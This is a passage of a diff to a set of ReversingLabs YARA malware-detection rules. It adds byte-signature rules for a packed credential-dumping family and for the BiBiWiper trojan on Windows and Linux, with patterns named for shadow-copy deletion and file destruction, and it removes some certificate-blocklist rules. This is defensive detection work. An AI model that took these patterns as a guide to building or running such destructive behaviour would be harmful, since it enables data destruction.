+            24 ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A
+            ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 53 8D 44 24 ?? 68 ?? ?? ?? ?? 50 53
+            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? BF ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 80 3D ?? ?? ??
+            ?? ?? A3 ?? ?? ?? ?? 8B C7 75
+        }
+		$UPX_Decompression = {
+            8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 EE ?? 11 DB 72 ?? B8 ?? ?? ?? ?? 01 DB 75 ??
+            8B 1E 83 EE ?? 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE ?? 11 DB 72 ?? 48 01 DB 75
+        }
+		$UPX_Encrypting = {
+            31 C0 8A 07 30 D8 04 ?? 2C ?? 88 07 47 39 CF 75
+        }
+		$dumping_functionv2014 = {
+            55 8B EC 83 EC ?? 56 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84
+            ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            89 45 ?? 85 C0 74 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 74 ?? 8B 45 ??
+            53 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ??
+            56 6A ?? 6A ?? 8B D8 6A ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 57 6A ?? 6A ?? 6A
+            ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 51 8B F8 52 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 57 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 53 FF D6 5F 5B 5E 8B E5 5D C3
+        }
+		$dumping_functionMidVersion = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ?? ?? ?? 33
+            DB BE ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 45 ?? 89 75 ?? 89 5D ?? 88 5D ?? FF 15 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 8B CF 8D 41 ?? 8A 11 41 3A
+            D3 75 ?? 2B C8 51 57 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
+            83 EC ?? 8B CC 89 65 ?? 6A ?? 89 71 ?? 89 59 ?? 68 ?? ?? ?? ?? 88 59 ?? E8 ?? ?? ??
+            ?? 83 EC ?? 8B CC 89 65 ?? 6A ?? 53 8D 55 ?? 89 71 ?? 89 59 ?? 52 88 59 ?? E8 ?? ??
+            ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B CC 89 65 ?? 6A ?? 89 71 ?? 89 59 ?? 68 ?? ??
+            ?? ?? 88 59 ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 89 65 ?? 6A ?? 53 8D 45 ?? 89 71 ?? 89
+            59 ?? 50 88 59 ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B CC 89 65 ?? 6A ??
+            89 71 ?? 89 59 ?? 68 ?? ?? ?? ?? 88 59 ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 89 65 ?? 6A
+            ?? 53 8D 55 ?? 89 71 ?? 89 59 ?? 52 88 59 ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 8B C4 89 65 ?? 68 ?? ?? ?? ?? 8D 4D ?? 51 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ??
+            ?? ?? 8B 7D ?? BE ?? ?? ?? ?? 83 C4 ?? 39 75 ?? 73 ?? 8D 7D ?? 68 ?? ?? ?? ?? 8D 55
+            ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B 40 ?? EB ?? 83 C0 ?? 8B
+            4D ?? 57 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 75 ?? 72 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83
+            C4 ?? 39 75 ?? 72 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 5E 33 CD 33 C0
+            5B E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$dumping_functionE = {
+            52 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 5? FF 15 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 6A ?? FF 15 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? 83 BD ?? ?? ?? ?? ?? 75 ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ??
+            ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52
+            8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF
+            15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 51 8B CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8
+        }
+		$dumping_functionP = {
+            50 57 56 FF 15 ?? ?? ?? ?? 8B F8 57 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 57 56
+            89 45 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BF
+            ?? ?? ?? ?? 57 56 68 ?? ?? ?? ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 6A
+            ?? 56 56 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 56 8B D8 8D 45 ?? 50 FF 75 ?? 89 75 ??
+            FF 75 ?? 53 FF 15 ?? ?? ?? ?? 53 FF 15
+        }
+		$dumping_functionB = {
+            52 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D BD ??
+            ?? ?? ?? F3 A5 A4 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 A4
+            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 95
+            ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 51 8B CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? E8
+        }
+		$dumping_function111 = {
+            68 ?? ?? ?? ?? 8D 55 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 39 58 ?? 72 ?? 8B 40 ?? EB
+            ?? 83 C0 ?? 50 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 39 5D ?? 72 ?? 8B 55 ?? 52 E8 ?? ?? ??
+            ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 E8
+        }
+		$dumping_function2 = {
+            55 8B EC 51 53 8B 5D ?? 56 68 ?? ?? ?? ?? 8D 45 ?? 53 50 33 F6 E8 ?? ?? ?? ?? 8B 4D
+            ?? 68 ?? ?? ?? ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            83 F8 ?? 74 ?? 57 8B 7D ?? 0F BE 14 3E 8B 4D ?? 51 33 D0 52 E8 ?? ?? ?? ?? 8B C7 83
+            C4 ?? 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B C2 8D 4E ?? 8B D1 2B D0
+            8B 45 ?? F7 DA 1B D2 23 D1 50 8B F2 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 5F 8B 4D
+            ?? 51 E8 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 5E 5B 8B
+            E5 5D C2
+        }
+		$lib_loader = {
+            68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 A3 ?? ??
+            ?? ?? FF D6 33 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57
+        }
+		$exception1 = {
+            B8 ?? ?? ?? ?? 50 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 33 C0 89 08
+        }
+		$exception2 = {
+            55 53 51 57 56 52 8D 98 ?? ?? ?? ?? 8B 53 ?? 52 8B E8 6A ?? 68 ?? ?? ?? ?? FF 73 ??
+            6A ?? 8B 4B ?? 03 CA 8B 01 FF D0
+        }
+		$exceptionallock = {
+            B8 ?? ?? ?? ?? 8D 88 ?? ?? ?? ?? 89 41 ?? 8B 54 24 ?? 8B 52 ?? C6 02 ?? 83 C2 ??
+            2B CA 89 4A ?? 33 C0 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WORK PLACEMENTS INTERNATIONAL LIMITED" and ( pe.signatures [ i ] . serial == "00:8e:3d:89:c6:82:f7:c0:da:d7:01:10:cb:7b:7c:82:63" or pe.signatures [ i ] . serial == "8e:3d:89:c6:82:f7:c0:da:d7:01:10:cb:7b:7c:82:63" ) and 1570626662 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $payload and ( $NSIS_CheckIntegrity or ( $UPX_Decompression and $UPX_Encrypting ) or $NSIS_ErrorPart or $dumping_functionv2014 or $dumping_functionMidVersion or ( $exception1 and $exception2 and $exceptionallock ) or $dumping_functionP or $dumping_functionE or $dumping_functionB or $dumping_function111 or $dumping_function2 or $lib_loader )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Ef2D35F2Ae82A767A16Be582Ab0D1Ba0 : INFO FILE
+rule REVERSINGLABS_Win32_Trojan_Bibiwiper : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BiBiWiper trojan."
 		author = "ReversingLabs"
-		id = "dc8f49b8-fda2-510c-8374-3261e75d11a9"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "8462ceb8-ec54-5f92-a3e7-c96e52647ca7"
+		date = "2023-11-28"
+		modified = "2023-11-28"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5732-L5750"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Win32.Trojan.BiBiWiper.yara#L1-L102"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0709290aeb18bcb855518e150c2768c24ab311f5c727cdc4c40145b879ff88b6"
+		logic_hash = "d75954c05a8f82ad90a4adf6a2a3748928488ddebe40d8f8a790bfcde0b02a11"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Trojan"
+		tc_detection_name = "BiBiWiper"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$delete_shadow_copies_p1 = {
+            48 89 5C 24 ?? 55 48 8D 6C 24 ?? 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4
+            48 89 45 ?? 33 DB 48 C7 44 24 ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 5C 24 ?? 48
+            8D 4C 24 ?? 48 89 5C 24 ?? 44 8D 43 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24
+            ?? 48 8B 54 24 ?? 48 0F 43 4C 24 ?? 48 03 D1 48 8D 4C 24 ?? 48 83 7C 24 ?? ?? 48 0F
+            43 4C 24 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48 8D 55 ?? 48 0F 43 4C
+            24 ?? 48 2B D1 0F B6 01 88 04 0A 48 8D 49 ?? 84 C0 75 ?? 0F 57 C0 C7 44 24 ?? ?? ??
+            ?? ?? 48 8D 45 ?? 45 33 C9 48 89 44 24 ?? 48 8D 55 ?? 48 8D 44 24 ?? 45 33 C0 48 89
+            44 24 ?? 33 C9 48 89 5C 24 ?? 48 89 5C 24 ?? 0F 11 45 ?? C7 44 24 ?? ?? ?? ?? ?? 89
+            5C 24 ?? 0F 11 44 24 ?? 66 89 5D ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ??
+            FF 15 ?? ?? ?? ?? 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8B 4C 24 ?? 48 FF C2 48 8B C1
+            48 81 FA ?? ?? ?? ?? 72 ?? 48 8B 49 ?? 48 83 C2 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ??
+            0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ??
+            ?? 48 89 5C 24 ?? 48 8D 4C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 7C
+            24 ?? ?? 48 8D 4C 24 ?? 48 8B 54 24 ?? 48 0F 43 4C 24 ?? 48 03 D1 48 8D 4C 24 ?? 48
+            83 7C 24 ?? ?? 48 0F 43 4C 24 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48
+            8D 55 ?? 48 0F 43 4C 24 ?? 48 2B D1 0F B6 01 88 04 0A 48 8D 49 ?? 84 C0 75 ?? 0F 57
+            C0 C7 44 24 ?? ?? ?? ?? ?? 48 8D 45 ?? 45 33 C9 48 89 44 24 ?? 48 8D 55 ?? 48 8D 44
+            24 ?? 45 33 C0 48 89 44 24 ?? 33 C9 48 89 5C 24 ?? 48 89 5C 24 ?? 0F 11 45 ?? C7 44
+            24 ?? ?? ?? ?? ?? 89 5C 24 ?? 0F 11 44 24 ?? 66 89 5D ?? 0F 11 45 ?? 0F 11 45 ?? 0F
+        }
+		$delete_shadow_copies_p2 = {
+            11 45 ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 48 8B 54 24 ?? 48 83 FA ?? 72 ?? 48 8B 4C 24
+            ?? 48 FF C2 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 8B 49 ?? 48 83 C2 ?? 48 2B C1 48
+            83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 5C 24
+            ?? 48 8D 15 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 4C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48 8B 54 24 ?? 48 0F 43 4C 24 ?? 48 03
+            D1 48 8D 4C 24 ?? 48 83 7C 24 ?? ?? 48 0F 43 4C 24 ?? E8 ?? ?? ?? ?? 48 83 7C 24 ??
+            ?? 48 8D 4C 24 ?? 48 8D 55 ?? 48 0F 43 4C 24 ?? 48 2B D1 90 0F B6 01 88 04 0A 48 8D
+            49 ?? 84 C0 75 ?? 0F 57 C0 C7 44 24 ?? ?? ?? ?? ?? 48 8D 45 ?? 45 33 C9 48 89 44 24
+            ?? 48 8D 55 ?? 48 8D 44 24 ?? 45 33 C0 48 89 44 24 ?? 33 C9 48 89 5C 24 ?? 48 89 5C
+            24 ?? 0F 11 45 ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24 ?? 0F 11 44 24 ?? 66 89 5D ?? 0F
+            11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 48 8B 54 24 ?? 48 83
+            FA ?? 72 ?? 48 8B 4C 24 ?? 48 FF C2 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 8B 49 ??
+            48 83 C2 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 B8
+            ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 4C 24 ?? 48 C7
+            44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48 8B 54 24 ??
+            48 0F 43 4C 24 ?? 48 03 D1 48 8D 4C 24 ?? 48 83 7C 24 ?? ?? 48 0F 43 4C 24 ?? E8 ??
+            ?? ?? ?? 48 83 7C 24 ?? ?? 48 8D 4C 24 ?? 48 8D 55 ?? 48 0F 43 4C 24 ?? 48 2B D1 90
+            0F B6 01 88 04 0A 48 8D 49 ?? 84 C0 75 ?? 0F 57 C0 C7 44 24 ?? ?? ?? ?? ?? 48 8D 45
+            ?? 45 33 C9 48 89 44 24 ?? 48 8D 55 ?? 48 8D 44 24 ?? 45 33 C0 48 89 44 24 ?? 33 C9
+            48 89 5C 24 ?? 48 89 5C 24 ?? 0F 11 45 ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C 24
+        }
+		$destroy_files_p1 = {
+            48 89 5C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48
+            33 C4 48 89 44 24 ?? 4D 8B E9 4D 8B E0 4C 8B F9 48 63 BC 24 ?? ?? ?? ?? 33 F6 89 74
+            24 ?? 48 8B 05 ?? ?? ?? ?? 48 FF C0 48 89 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 B8
+            ?? ?? ?? ?? ?? ?? ?? ?? 48 F7 E9 48 C1 FA ?? 48 8B C2 48 C1 E8 ?? 48 03 D0 48 69 C2
+            ?? ?? ?? ?? 48 3B C8 75 ?? 4C 8B 05 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8D 0D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 C1 E3 ?? 33 D2 49 8B C4 49 F7 F5 48
+            8B E8 48 2B EB 83 FF ?? 7E ?? 48 8D 47 ?? 48 0F AF C3 33 D2 49 F7 F4 EB ?? 48 8B D6
+            45 33 C0 49 8B CF E8 ?? ?? ?? ?? 49 8B CF E8 ?? ?? ?? ?? 48 63 C8 49 3B CC 0F 87 ??
+            ?? ?? ?? 49 8B C4 48 2B C1 49 8B FC 48 2B F9 48 3B D8 48 0F 42 FB 48 8B CF E8 ?? ??
+            ?? ?? 48 89 44 24 ?? 0F 57 C0 4C 63 F7 F3 0F 7F 44 24 ?? 48 89 74 24 ?? 85 FF 74 ??
+            48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 4C 3B F0 0F 87 ?? ?? ?? ?? 49 81 FE ?? ?? ?? ?? 72
+        }
+		$destroy_files_p2 = {
+            49 8D 4E ?? 49 3B CE 0F 86 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 48 85 C0 0F 84 ?? ??
+            ?? ?? 48 83 C0 ?? 48 83 E0 ?? 48 89 48 ?? EB ?? 49 8B CE E8 ?? ?? ?? ?? 48 89 44 24
+            ?? 4A 8D 1C 30 48 89 5C 24 ?? 4D 8B C6 33 D2 48 8B C8 E8 ?? ?? ?? ?? 48 89 5C 24 ??
+            C7 44 24 ?? ?? ?? ?? ?? 85 FF 7E ?? 48 8B DE 44 8B F7 66 0F 1F 44 00 ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 88 04 0B 48 8D 5B ?? 49 83 EE ?? 75 ?? 4D 85 ED 7E
+            ?? 4D 8B CF 41 B8 ?? ?? ?? ?? 48 8B D7 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 49 8B CF E8 ??
+            ?? ?? ?? 48 63 C8 48 8D 04 29 48 03 C7 49 3B C4 76 ?? 49 8B FC 48 2B F9 48 2B FD 48
+            85 FF 7E ?? 41 B8 ?? ?? ?? ?? 48 8B D5 49 8B CF E8 ?? ?? ?? ?? FF C6 48 63 C6 49 3B
+            C5 7C ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8B 4C 24 ?? 48 85 C9 74 ?? 48 8B 54 24
+            ?? 48 2B D1 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48
+            83 C0 ?? 48 83 F8 ?? 77 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ?? ?? 48
+            8B 9C 24 ?? ?? ?? ?? 48 83 C4 ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Workstage Limited" and ( pe.signatures [ i ] . serial == "00:ef:2d:35:f2:ae:82:a7:67:a1:6b:e5:82:ab:0d:1b:a0" or pe.signatures [ i ] . serial == "ef:2d:35:f2:ae:82:a7:67:a1:6b:e5:82:ab:0d:1b:a0" ) and 1567123200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $delete_shadow_copies_p* ) ) and ( all of ( $destroy_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_039668034826Df47E6207Ec9Daed57C3 : INFO FILE
+rule REVERSINGLABS_Linux_Trojan_Bibiwiper : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BiBiWiper trojan."
 		author = "ReversingLabs"
-		id = "c2a3477a-a4cf-586e-ba70-555cc577ab2c"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "c370dde0-71ff-5832-b131-6d61beb02b9b"
+		date = "2023-11-28"
+		modified = "2023-11-28"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5752-L5768"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Linux.Trojan.BiBiWiper.yara#L1-L76"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "792860feec6e599ba22ae3869ef132cf5b7be2e0572e23503e293444fd7c382d"
+		logic_hash = "8f290141d5da660463dede6df571d774448e136e2993a0a4c706245464e1239e"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Trojan"
+		tc_detection_name = "BiBiWiper"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$destroy_files_p1 = {
+            55 48 89 E5 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 48 89
+            95 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 44 89 8D ?? ?? ?? ?? 48 8B
+            05 ?? ?? ?? ?? 48 83 C0 ?? 48 89 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 BA ?? ?? ??
+            ?? ?? ?? ?? ?? 48 89 C8 48 F7 EA 48 89 D0 48 C1 F8 ?? 48 89 CA 48 C1 FA ?? 48 29 D0
+            48 69 D0 ?? ?? ?? ?? 48 89 C8 48 29 D0 48 85 C0 0F 94 C0 84 C0 74 ?? E8 ?? ?? ?? ??
+            48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89
+            D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ??
+            ?? 48 8D 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 CE 48 89 C7
+            E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89
+            CE 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ??
+            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D
+            8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ??
+            48 8D 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ??
+            ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48
+            89 C3 48 8D 8D ?? ?? ?? ?? 48 8D 45 ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ??
+            ?? 48 8D 45 ?? 48 89 DE 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8
+        }
+		$destroy_files_p2 = {
+            48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
+            ?? ?? 48 8B 85 ?? ?? ?? ?? 48 C1 E0 ?? 48 89 45 ?? 48 8B B5 ?? ?? ?? ?? 48 8B 85 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 48 F7 F6 48 8B 55 ?? 48 29 D0 48 89 45 ?? 83 BD ?? ?? ?? ??
